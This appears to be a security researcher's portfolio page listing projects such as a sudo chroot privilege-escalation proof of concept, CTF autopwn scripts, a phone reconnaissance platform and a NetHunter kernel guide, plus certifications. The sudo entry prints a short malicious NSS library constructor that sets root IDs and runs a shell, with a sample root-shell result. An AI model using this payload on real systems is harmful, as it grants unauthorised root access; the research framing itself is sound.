Cybersecurity Specialist · Security Researcher
ls -la ~/projects/
Proof-of-concept demonstrating how sudo's chroot option can be exploited to load malicious NSS libraries with root privileges. Includes automated reconnaissance, version analysis, permission enumeration, and staged payload delivery.
// malicious NSS library payload void __attribute__((constructor)) init(void) { setreuid(0, 0); setregid(0, 0); chdir("/"); execl("/bin/bash", "bash", "-c", cmd, NULL); } $ sudo -R bridge bridge # uid=0(root) gid=0(root)
Professional phone number reconnaissance platform with worldwide carrier lookup, cell tower geolocation, VoIP detection, and batch analysis. Major contributor — built the v1.1 Go scanner, API layer, and v2.0 ML-powered intelligence engine.
Complete kernel build guide for Kali NetHunter on Xiaomi Redmi Note 7 (lavender). Covers cross-compilation, defconfig patching, AnyKernel3 packaging, and Android 15 compatibility — tested and working on kernel 4.19.321+.
Lightweight C utility to control Linux CPU frequency governors. One binary, no dependencies — handles Intel P-State, turbo boost, per-core frequency management, and systemd boot persistence. Built for lab machines that need maximum throughput.
Cybersecurity orchestration framework with a Metasploit-style interactive shell. Integrates port scanning, MAC spoofing, Android security modules, and automated reconnaissance into a unified command interface for security research workflows.
Automated installer that transforms a clean Arch Linux into a security-focused workstation. Pulls in pentesting tools, configures XFCE4 for security workflows, sets up networking, and deploys a curated toolchain — purpose-built for offensive security.
End-to-end CTF automation scripts that chain recon, enumeration, exploitation, and privilege escalation into single-command workflows. Includes rootmeautopwn — a full autopwner for TryHackMe's RootMe covering upload bypass, webshell deployment, and SUID escalation.
GitNav for GitHub repo management, droidB & PyDroidb for Android device control, VM backup utilities, bandwidth testing tools, wallpaper managers, and other automation that fills the gaps in security research workflows.
cat ~/certifications.txt
Comprehensive program covering incident response, network security, vulnerability assessment, and Python automation.
View CertificateFoundational knowledge covering network fundamentals, web security, and Linux/Windows security essentials.
View CertificateRecognition for completing comprehensive security training modules and demonstrating cybersecurity competency.
View Badge./check_platforms.sh
Actively engaged in HackTheBox challenges, machines, and training paths to sharpen offensive security skills.
View ProfileContinuously learning through TryHackMe's hands-on cybersecurity training rooms and practical challenges.
cat ~/contact.txt